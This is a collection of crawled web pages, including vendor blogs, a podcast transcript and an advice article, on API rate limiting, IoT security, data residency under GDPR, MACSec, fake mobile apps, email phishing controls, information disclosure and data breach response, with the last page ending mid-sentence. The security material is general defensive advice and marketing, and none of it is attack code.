comments feel free to email me at firstname.lastname@example.org. I’m sure I’ve left out a ton of stuff that should have gone into this, and I’d appreciate any scolding along those lines.:
<urn:uuid:0b332325-5473-4d39-a8b0-d838144a873f>
CC-MAIN-2022-40
https://danielmiessler.com/study/infosecconcepts/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00132.warc.gz
en
0.949706
4,143
2.515625
3
API Rate Limiting is simply controlling how many requests or calls an API consumer can make to your API. You may have experienced something related as a consumer with errors about “too many connections” or something similar when you are visiting a website or using an app. What is an API consumer? An API consumer could be a mobile app, a website, or even your doorbell or thermostat! Anything that makes a call to an API to get data is an API consumer. These are made via API Requests. What is an API request? An API request (or call) is where one of these consumers, say your thermostat, requests information from “the cloud” (or servers on the internet). Say your thermostat wants to find out what the current weather conditions are so that it can display those for you. That would be an API request. The largest number of API requests, by far, come from mobile apps. A single mobile app might make between 10-20 API requests, just by you opening an app and logging in! How are API Rate Limits typically set? API Rate Limits are typically set up to limit the number of requests either by: - per second - per minute - per hour - per day (or 24-hour periods) - per month An API is not limited to picking just one of these. You could have one API Rate Limit per second and a different API Rate Limit per-hour. One or more API Rate Limits can be active at the same time. API Rate Limiting might even be implemented differently depending on if you are authenticated or not. Authenticated API users (or API consumers that have included their credentials in the API Call) might be allowed more requests than anonymous users. Do I need to implement API Rate Limiting? Most likely, yes. But it’s important to understand the reasons why you might need them. If you are going to measure the success (or failure) of rate limits, you have to have a clear and defined purpose. What are the reasons typically given for needing API Rate Limits? Here are some reasons you might hear but not every one of these problems is best solved by API Rate Limits! Protect your APIs from Distributed Denial of Service Attacks or DDoS. While these attacks are a very real threat and can take down your API (which is a bad thing), API Rate Limiting is probably not the right solution for blocking these attacks. There are other and more robust solutions for protecting your APIs from DDoS that should be looked at first. Limit your backend expenses and costs This can be a very legitimate reason for implementing API Rate Limiting. Let’s go back to the thermostat example. Say there is a line of thermostats that go bonkers and go into some loop where they are calling your weather API over and over. While this might not take down your API, it could cost you a pretty penny because you are the one that has to pay for all the backend servers and services that make that weather API work! By limiting the calls per consumer, you could protect your resources and money! Workaround hardware limitations Getting a lot of API Calls could mean that your backend servers can’t keep up properly. This could lead to bottlenecks and the equivalent of driving on the highway during rush hour traffic. It could slow everyone down as requests are queued up. Slow API Calls could mean things like really slow web pages and really unhappy users. What are my options for implementing API Rate Limits? - There are a few different ways of handling API Rate Limits: Hard Stop: This means an API Consumer will get an Error 429 when they call your API if they are over their limit. - Soft Stop: In this case, you might have a grace period where calls can continue to be made for a short period after the limit is reached. - Throttled Stop: You might just want to enforce a slowdown on calls made over the limit. This way users can continue to make calls, but they will just be slower because they are over the limit. - Billable Stop: Here you might just charge the API consumer for calls made over their limit. Obviously, this would only work for authenticated API users but can be a valid solution. 💡 Bonus tips for API Rate Limits! If you don’t want your API Users to hate you, there are three things you need to do: 1️⃣ Don’t be greedy As we talked about earlier, there are several reasons for needing to implement API Rate Limits. Getting too greedy with your limits though can keep users from being able to implement the solutions they need to help them win. You win when your users win, so don’t drive them to abandon your API for a competitor’s API because you arbitrarily set your limits to low. 2️⃣ Be transparent and informative Be transparent with users on how you implemented API Rate Limiting and what methods you choose to handle it when users go over their limit. You really want to make sure that you are upfront with your users if you are going to be charging them for overages. Clearly, document everything and educate your users, not only about your API Rate Limiting Policy but also about steps they can take to avoid hitting those limits. 3️⃣ Let API consumers know what the status of their API Limits are in every call. There are a couple of different ways to implement this, but most APIs will add a header to the API response that tells the consumer how many calls they have left for this period and when the counter will reset. This way API consumers can make informed decisions about when (and how many) API Calls to make. 💡 Learn more about API Strategy and Best Practices [Free Download]
<urn:uuid:ac43235d-fdf3-466b-97a0-3f78ffebcd1d>
CC-MAIN-2022-40
https://blog.axway.com/learning-center/apis/api-management/api-rate-limits
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00132.warc.gz
en
0.938225
1,221
2.671875
3
By now, everyone has heard the numbers. IoT is part of a networking revolution that is transforming the world. Experts predict that by 2020 there will be over 33 billion IoT devices deployed, or 4.3 Internet-connected devices for every man, woman, and child on the planet. Of course, IoT is more than just one thing. There are a variety of IoT devices and categories, each with their own implications. Consumer IoT includes the connected devices we are most familiar with, such as smart cars, phones, watches, laptops, connected appliances, and entertainment systems. Commercial IoT includes things like inventory controls, device trackers, and connected medical devices. Industrial IoT covers such things as connected electric meters, waste water systems, flow gauges, pipeline monitors, manufacturing robots, and other types of connected industrial devices and systems. The implications for networks, and especially security, are huge. Increasingly, IoT devices are being woven into local, national, and global networks, including critical infrastructures, creating hyperconnected environments of transportation, water, energy, communications, and emergency systems. Healthcare agencies, refineries, agriculture, manufacturing, government agencies, and even smart buildings and cities all use IoT devices to automatically track, monitor, coordinate, and respond to events. While automating decisions and processes at machine speeds can generate revenue, improve our quality of life, make us more productive, and even save lives, it also introduces new risks and widens the threat landscape. 1. Some of the data passing from, to, or between connected devices contains personal information that can be exploited, including locations, names and addresses, ordering and billing information, credit card and bank information, medical records, government-issued ID numbers, etc. 2. When compromised IoT devices are connected to IT networks, they can become a conduit for breaches or the injection of malware. 3. Compromised Industrial and Commercial IoT devices can be used to make changes on the manufacturing floor. Operations technology, SCADA, and industrial control systems actually control physical systems, not just the bits and bytes of traditional IT networks, and even the slightest tampering can sometimes have far-reaching - and potentially devastating - effects. 4. Increasingly, IoT is also being integrated into our critical infrastructure. Transportation systems, chemical refineries, wastewater systems, energy grids, culinary water, and communications systems all use IoT devices. The cascading effect of a serious compromise can be potentially catastrophic. The challenge is that many IoT devices were never designed with security in mind. IoT security challenges include weak authentication and authorization protocols, insecure software, firmware with hard-coded back doors, poorly designed connectivity and communications, and little to no configurability. And most IoT devices are “headless,” with limited power and processing capabilities. This not only means they can’t have security clients installed on them, but most can’t even be patched or updated. The risk is real. Just last fall, compromised IoT devices were gathered into a massive botnet, causing the largest denial of service outage in history. Unfortunately, the general response by the security industry has been woefully inadequate. Sure, the expo floor at this year’s RSA conference is filled with vendors promoting devices and tools to sooth the IoT worries of organizations. The problem is that the network teams that need to test, deploy, manage, and monitor these devices are already overwhelmed. Dozens of isolated devices with separate management interfaces have placed a strain on limited IT resources. Large enterprises already need to manage an average of 30 security consoles, connected to hundreds of security devices that usually operate in isolation. This makes gathering threat intelligence a cumbersome and time-consuming task, often requiring the hand correlation of telemetry data in order to identify malware or compromised systems. And now, specialized security tools being created and promoted for IoT are going to expand the number of deployed hardware-based and virtual security devices even further. The reality is, IoT cannot be treated and secured as an isolated, independent network. It interacts across your existing extended network, including endpoint devices, cloud, traditional and virtual IT, and OT. Isolated IoT security strategies simply increase overhead and reduce broad visibility. Instead, security teams need to be able to tie together and cross-correlate what is happening across their IT, OT, IoT, and cloud networks. Such an approach enables visibility across this entire ecosystem of networks, allowing the network to automatically collect and correlate threat intelligence and orchestrate real-time responses to detected threats. This requires a rethinking your security strategy. A distributed and integrated security architecture needs to cover your entire networked ecosystem, expand and ensure resilience, secure compute resources and workloads, and provide routing and WAN optimization. The Fortinet Security Fabric solves the challenge of security sprawl by integrating your security infrastructure together into a single, holistic framework. This allows you to effectively monitor legitimate traffic, including IoT devices, check authentication and credentialing, and impose access management across your distributed environment through an integrated, synchronized, and automated security architecture managed through a single pane of glass. In addition to our innovative Security Fabric solution, Fortinet is actively driving the development of IoT-specific security solutions. We already hold dozens of issued and pending IoT security patents that complement our industry-leading patent portfolio and have been woven seamlessly into out Security Fabric framework. Our commitment to innovation helps ensure that Fortinet continually delivers the most advanced security solutions designed to help organizations defend against the continually evolving threat landscape that threatens the success of their digital business and the emerging digital economy.
<urn:uuid:249fca9e-dbe2-456d-9b7e-3bbe5d638af5>
CC-MAIN-2022-40
https://www.fortinet.com/blog/industry-trends/the-challenge-of-securing-iot
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00132.warc.gz
en
0.931681
1,139
3.234375
3
How the Social Internet of Things is Revolutionizing Connectivity Humans are both innovative and social beings leading to technological advances that are changing the way we interact. The desire to connect has inspired a global technological network linking people, data, and things. Traditionally, our conception of cloud – or Internet-based social solutions has existed in the digital world. We send emails, conduct video calls, or share social media posts. But our collective need to use resources efficiently and information effectively has led to innovations that also link objects to this network. The inclusion of sensors and actuators are turning everyday devices into smart objects. This interaction of smart objects with people through the Internet is called the Internet of Things or IoT. It is not enough to simply have objects connected: they need to achieve something or provide value with that connection. Objects like heart monitors and cars that were once distinctly separate objects are now connected to a network through the cloud. Doctors benefit by being able to regularly track patients’ heart rates. Patients benefit from regular oversight and monitoring without frequent office visits. Cars connect to GPS and anti-theft systems providing valuable information and protection for consumers. It is this real-time automated transfer of information providing accurate and actionable information with little or no human intervention required that makes the Internet of Things instant and effortless. The Internet of People (IoP) takes the Internet of Things mobile with personal electronics. Mobile phones, fitness wrist bands, Google glasses, and any devices worn or embedded in textile products with sensors that communicate via the Internet with a human interface fall under this classification. The Internet of People already runs on billions of devices. Both the Internet of Things and the Internet of People make big promises to benefit and enrich the lives of people. Despite claims that technology is making us more isolated and less communicative, we are actually at an exciting point for social networking and ubiquitous connectivity. Connecting People with the World Around Them We believe that technology and social connectivity should be seamless which is why we provide instant and effortless access with technology that builds meaningful relationships. Relationships with our friends, families, colleagues, customers, and suppliers as well as with the environment around us. In today’s world, networking is essential for success and oftentimes happiness. We want to meet the right people, however, networking is not as easy as walking up to a person and saying “Hello.” We have created a phone-to-phone technology that allows users to view social profiles of people nearby, so we can discern who matches our aims and goals. Whether we are looking for a business partner or searching for love, it is no longer a game of chance where we hope to stumble across somebody compatible. Our application facilitates connections so people never miss an opportunity to meet someone new. We all want the advantages of technical convenience without giving up control over the information we share. As the concepts of the Internet of Things and the Internet of People evolve, so do the demands and wishes of the users. Ubiquitous computing brings with it intrusive privacy concerns. We will connect, but we will also retain our autonomy and privacy. The Social Internet of Things connects objects and people into networks defined and managed by the user. Such networks create a technological interface between people and both the physical and virtual world. This helps them to find resources, obtain contextual information, and become visible. In a Social Internet of Things world, individuals define the parameters to take control of their privacy. Yet, humans and things operate as equals and can request or provide information while maintaining their individuality. Our app is an excellent example of Social Internet of Things technology. It combines socially relevant technologies into a platform that not only offers people-to-people connections, but also seamlessly interacts with sensors in the environment. We carry our mobile phones with us every day. Your mobile phone can now give you more access to the experiences you want. The possibilities of inter-connectivity are captivating. On an intimate level, its potential for elevating our personal interactions by improving the ways in which we interact with the everyday things that impact our lives is worthy of excitement. Events like conferences and festivals are places where we socialize. We attend to experience or learn something new and meet new people. Events are where we come together for either personal or professional engagement. But now we can also interact with the environment as well. The Social Internet of Things is redefining our event experience. Cutting edge technology is ushering in a new era. Mobile innovation is enhancing the experience. Not only can attendees find and meet the right people with apps such as MeetVibe, but event organizers can offer additional advantages by incorporating physical beacons onsite as well. People attending can receive welcome messages as they arrive with links to event mapping and schedules sent directly to their mobile phones. With beacons you do not need to buy exhibition headphones to learn more about each item. Instead, the information can be directly broadcast to attendees’ mobile phones as they approach an item. Festival organizers can also encourage attendees to explore less popular areas of a show by offering rewards or games that direct traffic. The opportunities for interaction and engagement are vast Today, presentations need to be more interactive than ever. But this communication requires an interface and getting to that interface is often a slow process. Instead of posting a link on a screen for audience members to type into their mobile phones, the presenter can send everyone in the audience a link making the process instant and effortless. No delays, no interruptions. A simple click and go. Presenters can also avoid being overwhelmed with administrative email requests for presentation slides after the show by automatically delivering a link to slide decks, websites, contact information, or e-books. Beaconing technology enables this type of instant communication, while the Social Internet of Things technology allows people to control if and when they choose to interact. Mobile social networking platforms create an environment for this social interaction. Each event organizer does not need to create their own mobile app. And attendees do not need to download an app for each event. Instead attendees simply join events and start networking. Event organizers are engaging and building meaningful relationships with their attendees by including Social Internet of Things technology. The brilliance is in its consideration of all the factors that affect inter-connectivity – humans, objects, and information alike. The Social Internet of Things is technology that enhances social connectivity, enabling a new way of engaging one another and building meaningful relationships with the world around us. Our app provides instant access to discovery, connectivity, and scheduling.
<urn:uuid:b5fe3fb7-5b2b-47a3-b827-ca2683bdb830>
CC-MAIN-2022-40
https://www.iiot-world.com/industrial-iot/digital-disruption/how-the-social-internet-of-things-is-revolutionizing-connectivity/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00132.warc.gz
en
0.936143
1,335
3.09375
3
It pays to know where your data lives. And for some industries and countries, it’s mandatory. So, the question is: what is data residency and why should you and I care about it? Get the scoop on how GDPR and other regulations underscore the value of keeping your data close to home — and the related benefits that go beyond compliance. Data residency has become one of the big (but important!) things businesses have to think about, so let’s go Ask Dux! In today’s episode: What is data residency? Think about your stuff in the office. You know where your things are. You know where your computer is, your desk chair, your coworkers. But what about the actual data that you work with on a daily basis? You might not know where that goes in the cloud, and certainly, that is tied into the geographic location as to where it’s stored. When we talk about data residency, we’re talking about the storage of personal information within a particular region where the data is processed, which is also in accordance with the laws of that particular geographic destination. Why is it important? In the past, prior to the cloud, organizations pretty much took care and kept their own data, especially back in the days of on premises. A lot of the providers and organizations themselves are responsible for the personal information they hold. But today with the cloud, in some cases, we don’t know where the data is physically stored. And so, there are a lot of concerns — especially by government organizations — about how it’s being used, and that this data may not be well protected. There are general cybersecurity concerns, especially about government requests. There are situations where governments want to make sure that data sitting in their certain geographies or residency are well protected. Some governments even mandate data residency requirements as an extra layer of security, especially if you’re a government organization. Hence, that’s why it’s no surprise providers like Microsoft or Amazon, or even Google, have local data centers. And not just local data centers, they may have data centers specific to that government. General Data Protection Regulation (GDPR): The gold standard of data regulation GDPR is a data compliance standard that was established in Europe. It was one of the first sweeping standards around protecting personal information. There’s a lot of guidelines and rules around it, but essentially, what it says is: any organization that has access or that’s keeping personal data of any European citizen should protect it to a certain standard. If it so happens that that information is breached or something happens to it, that organization or that government entity will be held liable and responsible for it. They lay out guidelines on how organizations are supposed to protect personal information of Europeans. That’s the general idea around it. There’s also a lot of consideration around it. For example, one common thing that we now see a lot is the ‘right to forget’. Let’s say you work for an organization and you’re a European citizen and you leave your employer. You can actually ask your employer to get rid of any personal information that they have around you. Not just your record—it could be emails, chats, documents. So, there’s a lot of these guidelines. And shortly after GDPR, there’s a lot of other compliance regulations that came up like the CCPA (California Consumer Privacy Act). We are also seeing a lot of similar guidelines that are coming out as well, such as in South America. How should you comply? GDPR is very strict, and enforcement is very strong. We’ve already seen a lot of companies being fined up to 20 million euros—roughly around 20 million US dollars depending on the exchange rate. What needs to happen is, organizations that need to comply with this not only need to put all these policies in place, but also make sure that these policies are being enacted. And they need technology for that. For us at AvePoint, we do have technologies and capabilities to help these organizations comply with GDPR and make sure that data is protected. And if you get audited, you can prove that you’re complying with GDPR. Complying with data regulations the right way It begins with data mapping: understanding what data you have and where it’s located. Especially now where a lot of organizations may be global, you may have colleagues and employees in different parts of the world. If it’s spread out like that, you need to analyze what applicable laws and regulations you need to comply with and what are some of the associated risks. Basically, you need to proactively control your data location, calculate risks, and take actions required to minimize unwanted data exposure and inappropriate access. Long story short, be more proactive about it, know what the policies and guidelines are, and as best as you can, enable technology to support those guidelines and make sure that you comply with it. Join us on your GDPR journey: GDPR | EU General Data Protection Regulation | AvePoint GDPR Compliance: Why Multi-Geo Tenancy Matters (Case Study): GDPR Compliance: Why Multi-Geo Tenancy Matters (Case Study) (avepoint.com) Check out Forrester’s New Wave SaaS Application Data Protection Q4 2021 report where only AvePoint received the highest possible score for multi-cloud SaaS backup criteria. Get free access to the report at avepoint.com/report. Don’t forget to send us your questions on Twitter with a hashtag #AskDux or send us an email at email@example.com. Subscribe where you get your podcasts! Search for “#ShiftHappens” in your favorite podcast app.
<urn:uuid:2936f3b8-dd9f-46ed-9a5d-fae6117a8b1e>
CC-MAIN-2022-40
https://www.avepoint.com/blog/shifthappens/data-residency?amp
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00132.warc.gz
en
0.945682
1,241
2.625
3
Understanding MACSec Encryption Security breaches can occur at any layer of the OSI model. At Layer 2, some of the common breaches are MAC address spoofing, ARP spoofing, Denial of Service (DoS) attacks against a DHCP server, and VLAN hopping. MACSec secures data on physical media, making it impossible for data to be compromised at higher layers. As a result, MACSec encryption takes priority over any other encryption method such as IPsec and SSL at higher layers. MACSec is configured on the Customer Edge (CE) router interfaces that connect to Provider Edge (PE) routers and on all the provider router interfaces.
<urn:uuid:30b76f25-b86d-4279-9c37-dc017bb2e25e>
CC-MAIN-2022-40
https://www.cisco.com/c/en/us/td/docs/iosxr/ncs5500/security/71x/b-system-security-cg-ncs5500-71x/b-system-security-cg-ncs5500-71x_chapter_0101.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00132.warc.gz
en
0.859156
133
2.84375
3
It seems some malicious app developers have taken the phrase “fake it ‘til you make it” to heart, as fake apps have become a rampant problem for Android and iPhone users alike. Even legitimate sources, such as Google Play and Apple’s App Store, have been infiltrated with illegitimate applications, despite their own due diligence in combating this phenomenon. After downloading a fake app, cybercriminals leverage ransomware or malware through ads to run in the background of your device to do damage, making it difficult to notice something’s off. But while you’re minding your own business, your personal data –such as usernames, photos, passwords, and credit card information– can be compromised. Malicious apps have become more challenging to detect, and even more difficult to delete from a device without causing further damage. The trend of fake apps shows no sign of slowing down either, as bad actors have become more brazen with the apps they work to imitate. From Nordstrom to Fortnite to WhatsApp, it seems no business or industry is off limits. Luckily, cybercriminals have yet to figure out a sure-fire way to get their fake apps onto our devices. By paying extra attention to detail, you can learn to identify a fake app before downloading it. Here’s how: - Check for typos and poor grammar. Double check the app developer name, product title, and description for typos and grammatical errors. Malicious developers often spoof real developer IDs, even just by a single letter, to seem legitimate. If there are promises of discounts, or the description just feels off, those signals should be taken as red flags. - Look at the download statistics. If you’re attempting to download a popular app like WhatsApp, but it has an inexplicably low number of downloads, that’s a fairly good indicator that an app is most likely fraudulent. - Read what others are saying. When it comes to fake apps, user reviews are your ally. Breezing through a few can provide vital information as to whether an app is authentic or not, so don’t be afraid to crowdsource those insights when you can. If you do find yourself having accidentally downloaded a fake app, there are steps you can take to rid your phone of it. Here’s what to do: - Delete the app immediately or as soon as you notice anything suspicious. If you can’t find it, but you’re still having issues, the app could still be on your device. That’s because, in the interest of self-preservation, fake apps can try and protect themselves from disposal by making their icon and title disappear. If that happens, go to your installed apps page(s) and look for blank spaces, as it may be hiding there. - Check the permissions. After installation, check the app’s permissions. Fake apps usually give long lists of frivolous requests in an effort to get access to more data. - Clear the app’s cache and data. If you do find the app you want to delete, this is the first step you must take in order to get the app completely off your phone. - Take it into your provider. If you’re still having issues after you’ve deleted an app, consider taking your device into your provider to run a diagnostic test. - Factory reset. As a last resort, if you can’t find the app because it has “disappeared,” or traces of the app and malware linger, the best way to ensure it is completely gone is to wipe the data, factory reset your device, and start over. This is why it is vital to have backups of your devices. Even as this ever-growing trend of malicious developers spoofing legitimate applications to gain access to victims’ personal information continues, we can deter their advances simply by paying closer attention to detail. Remember to be vigilant about being aware of the signs to avoid fake apps at all costs. Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
<urn:uuid:6c4bf516-d909-46ea-8239-dcd501a5a56a>
CC-MAIN-2022-40
https://www.mcafee.com/blogs/consumer/mobile-and-iot-security/fake-apps-taking-over-phone/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00132.warc.gz
en
0.942171
857
2.546875
3
Email Phishing background Email phishing frauds have been on the rise since the early 90’s. A group of hackers that called themselves the warez community carried out the first Email phishing attack. The group created an algorithm that allowed them to generate random credit card numbers to open AOL accounts. Those accounts were then used to spam others in AOL’s community. Related: 9 Popular Phishing scams The internet has not only helped connect people all over the world but has also left business and organizations open to attacks. According to Symantec’s 2018 Internet Security Threats Report: Spear-phishing emails emerged as by far the most widely used infection vector, employed by 71 percent of groups. A case of Human Error while handling email phishing Given the nature of the email eco-system, no matter how secure the email platform is, the weakest link is the human. Organisations regularly remind users to beware of phishing attacks, but many users don’t really know how to recognize them. According to a Verizon cybersecurity report: An attacker sending out 10 phishing emails has a 90 percent chance that one person will fall for it. - If your domain is acmecorp.com and your customer receives a mail from acmecarp.com (o changed to a), the customer may not notice the difference and may act on the contents of the email. - A malicious user can send a mail to your customer from another mail server, masquerading your domain acmecorp.com. If the receiver mail server is a good quality mail server, such a mail will be marked as SPAM since the receiver server would inspect the DNS records of acmecorp.com and confirm the SPF, DMARC, DKIM records and figure out that this particular mail never originated from an authorized acmecorp.com mail server. However, if the receiver server is a low-quality mail server, it will deliver the email to the user and now it is up to the user to recognize the fraud. - A user received a mail from his chairman, with some instructions. The user responded to the email with the required information, before realizing that the mail was actually not from the chairman. While the name of the sender was the same as chairman’s name, the email id was a public email id. So technically it’s a legitimate email from valid email id. The display name can be set to anything. Most email clients simply show the display name, when you read the email. So it may be misleading. In all these cases, technically your email id has been spoofed, without even using your email platform. The consequences of the actions of your customer are neither your responsibility nor of your email platform. How does Mithi SkyConnect control email Phishing and Email Fraud? Our solution is enabled with and protected by strong controls to ensure that emails sent and received from our system cannot be intercepted and modified. Some of the controls we deploy: - All traffic to and from our service is encrypted, which prevents eavesdropping or tampering. - All access to the service is via authentication, which is controlled by strong password policies - Mithi SkyConnect is running ATP (advanced threat protection) and uses sand-boxing to filter malware. - While sending emails from our service, the system checks for spoofed email, to ensure that the “sender email id”, “sender’s password” and the “sender’s claim as sender” are all in sync. This means that only I can send a mail from my ID. - We recommend and work with you to deploy DKIM, DMARC and SPF records in your DNS to help you receivers confirm that mail coming from your email domain are actually sent by authorized mail servers For a full list of security controls, please read this. Our Recommendation: Introducing processes to minimize instances of Email Phishing To help secure our customer’s email flow, we recommend a combination of People, Processes and Technology. We suggest the following policies to be deployed, in addition to the tight security controls provided by SkyConnect: - While making financial transactions, the customers/vendors have to be sensitized to review the information they receive by an alternate method like a phone call. Alternatively, we strongly suggest not to use email but instead use an authenticated application portal, where you can enter requests for payment etc. This would be something similar to a ticketing system. - If you must send sensitive information over email, then encrypt and digitally sign the email to secure the communication. Limit it to ONLY the 2-3 people who are privy to this conversation. This can be done from Baya3, Thunderbird or Outlook by using the sign email feature. - Put in a filter on the inbound mail scanner to insert a message for mail coming from external domains to alert the users. - Build awareness among the user community to be more vigilant before responding to external email asking for personal information, financial information and other classified information. This should be done on an ongoing basis using classrooms, videos, FAQs, and email alerts. Report the mail as abuse on the sending platform, so they can take appropriate action. We propose that you also report this to the local cyber-crime unit of your region. These units can authoritatively ask the public email solution provider or the sender’s IT team for more information to locate the user via the IP address. Strong security controls and a strong complimentary process can minimise instances of email phising and email fraud in your business.
<urn:uuid:46d3c962-08ab-4177-801b-4b078ce021c6>
CC-MAIN-2022-40
https://skyconnect.mithi.com/blogs/email-phishing-humans-are-the-weakest-link/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00132.warc.gz
en
0.917514
1,200
2.9375
3
Secure your business with CyberHoot Today!!! Information Disclosure, also known as Information Leakage, is when a website unintentionally reveals sensitive information. Depending on the context, websites may leak all kinds of information to a potential attacker, including: - Data about other users, such as a valid username via failed login messages or personal information that should not be provided to anyone except its owner - Sensitive commercial or business data - Technical details about the website and its infrastructure Leaking sensitive user or business data can lead to compromise of the business or the confidentiality of personal information. However, disclosing technical information can be severe as well. Although some of this information will be of limited use, it can potentially be a starting point for exposing additional attack surfaces, containing other vulnerabilities to exploit. For example, disclosing the applications and versions running on a website may reveal the appropriate exploits to run to compromise unpatched applications. Sensitive information may be unintentionally leaked to users who are simply browsing the website in a normal fashion. More commonly, an attacker causes information disclosure by interacting with the website in unexpected or malicious ways. They will then carefully study the website’s responses to try and identify interesting behavior. Some examples of information disclosure are found below: - Revealing the names of hidden directories, their structure, and their contents via a robots.txtfile or directory listing - Providing access to source code files via temporary backups not properly protected - Explicitly mentioning database table or column names in error messages - Unnecessarily exposing highly sensitive information, such as credit card details - Hard-coding API keys, IP addresses, database credentials, and so on in the source code - Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior How Does My SMB or MSP Prevent This? One of the primary prevention methods revolves around developers and those who work administratively within the company website. The recommendations below are strictly for administrators or developers of your website or application: Additional Cybersecurity Recommendations In addition to the above recommendations, the items below will help you and your business stay secure against many of the threats you may face on a day-to-day basis. All of the suggestions listed below can be gained by hiring CyberHoot’s vCISO services. - Govern employees with policies and procedures. You need a password policy, an acceptable use policy, an information handling policy, and a written information security program (WISP) at a minimum. - Train employees on how to spot and avoid phishing attacks. Adopt a Learning Management system like CyberHoot to teach employees the skills they need to be more confident, productive, and secure. - Test employees with Phishing attacks to practice. CyberHoot’s Phish testing allows businesses to test employees with believable phishing attacks and put those that fail into remedial phish training. - Deploy critical cybersecurity technology including two-factor authentication on all critical accounts. Enable email SPAM filtering, validate backups, deploy DNS protection, antivirus, and anti-malware on all your endpoints. - In the modern Work-from-Home era, make sure you’re managing personal devices connecting to your network by validating their security (patching, antivirus, DNS protections, etc) or prohibiting their use entirely. - If you haven’t had a risk assessment by a 3rd party in the last 2 years, you should have one now. Establishing a risk management framework in your organization is critical to addressing your most egregious risks with your finite time and money. - Buy Cyber-Insurance to protect you in a catastrophic failure situation. Cyber-Insurance is no different than Car, Fire, Flood, or Life insurance. It’s there when you need it most. All of these recommendations are built into CyberHoot the product or CyberHoot’s vCISO Services. With CyberHoot you can govern, train, assess, and test your employees. Visit CyberHoot.com and sign up for our services today. At the very least continue to learn by enrolling in our monthly Cybersecurity newsletters to stay on top of current cybersecurity updates. CyberHoot does have some other resources available for your use. Below are links to all of our resources, feel free to check them out whenever you like: - Cybrary (Cyber Library) - Press Releases - Instructional Videos (HowTo) – very helpful for our SuperUsers! Note: If you’d like to subscribe to our newsletter, visit any link above (besides infographics) and enter your email address on the right-hand side of the page, and click ‘Send Me Newsletters’.
<urn:uuid:43d0dedd-d31e-49bb-a635-d23360da7f2a>
CC-MAIN-2022-40
https://cyberhoot.com/cybrary/information-disclosure/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00333.warc.gz
en
0.900169
1,004
2.765625
3
The cyber threat landscape in Australia continues to be a challenge for businesses, with more… In today’s digital age, malicious actors are becoming bolder and wilier when it comes to stealing data. Simply putting safeguards in place isn’t enough anymore; the chances that your private data could be exploited are rising, and you need to have plans in place in the event of a data breach. What is a data breach? A data breach is a cyber-attack which results in the release of sensitive data. It usually involves a malicious actor gaining access to a system and exploiting its vulnerabilities to extract private data. The malicious actors extract information from the system through phishing – the process of acquiring sensitive information through deceptive tactics like sending email links from a seemingly trusted source – or by using malware such as keyloggers and spyware. However, a data breach can also occur through the accidental release of data, like a company systems administrator accidentally uploading a file containing the company’s customer’s social security numbers onto a public server, rather than the secured server for employees only. Data breaches hurt companies, and some never recover. Once the sensitive information is leaked to the public, they may lose customers or even be subjected to lawsuits. Other harm caused by data breaches include: - Reputational damage - Identity fraud or theft - Financial loss - Employment or business opportunities lost - Disruption of company services - Spam emails - Legal implications One of the largest data breaches in Australian history was suffered by tech unicorn Canva in May 2019. The company’s systems were breached, and up to 139 million users’ details including usernames, email addresses, and hashed passwords were stolen. The intruder was stopped mid-attack, but the high-profile company suffered a harsh blow to its reputation. Precautions to take in advance Malicious data breaches result from cyber-attacks. Malicious actors gain unauthorised access to your data through methods like phishing, brute force attacks, and malware. Knowing how these attacks work is the first step in being able to prevent them. - Phishing: this deceptive attack is designed to fool the unwary. Malicious attackers pose as trusted individuals or organisations to coax you into handing over access to sensitive data, like sending an email with a link. Clicking on the link then gives the attacker access to your system. - Brute force: less sophisticated but determined attackers might use software tools to work through your password possibilities. If your password is weak, it can take only seconds to crack. - Malware: the invasion of computer systems by harmful software, like spyware, ransomware, Trojans, or worms. Malware exploit the vulnerabilities in your system and can disable your antivirus software, spy on keystrokes for passwords, and encrypt data. You should always be wary of potential data breaches. Every person who interacts with your system is a vulnerability and must be aware of the risks to data. Steps to avoid a data breach: - Assess and analyse the level of risk - Set security controls like firewalls, identity and access management, and security patch updates - Install anti-virus software - Establish a cybersecurity policy - Use high-grade encryption for sensitive data - Implement a password manager for all employees to use - Enable multi-factor authentication - Establish and test data breach response plans - Patch and upgrade software as soon as it’s available - Educate employees in social engineering attacks Security is only as strong as its weakest link. By implementing strong cybersecurity protocols, you reduce your risk of becoming a victim of a data breach. However, no matter the strength of your preventative measures, assuming the worst will keep you ready in the case of a data breach incident. Steps to take in the event of a data breach Under the Notifiable Data Breach (NDB) scheme, any organisation or agency the Privacy Act 1988 covers must notify the affected individuals and the Office of the Australian Information Commissioner (OAIC) if it seems the data breach is likely to cause serious harm to individuals whose personal information is stolen or leaked. On top of that, when a breach has occurred, it’s vital that you already have an incident response plan you can immediately set in motion to reduce the risk and minimise the harm to affected individuals – not just yourself, but your customers. An incident response plan will enable you to quickly respond to a data breach notification and minimise the damage. The OAIC recommends four key steps: - Contain the data breach to prevent any further compromise of information - Assess the breach by gathering facts and evaluating the risks - Notify the individuals involved and the Commissioner if required - Review the incident and consider what actions to take to prevent future breaches Assemble a response team and ensure each individual is primed on their role and responsibilities in the event of a breach. Putting the team through their paces with a simulation breach test will cement their confidence and collaboration. An ideal response team will consist of: - Team leader: leading the team and responding to management - Project manager: co-ordinating and supporting the team - Key privacy officer: privacy expertise - Legal support: identifying legal obligations - Risk management support: assessing the risks - Forensics support: establishing the cause and impact involving ICT systems - HR support: if the breach was due to an employee’s actions - Media/communications support: liaising with affected individuals and dealing with media announcements The size and scope of your 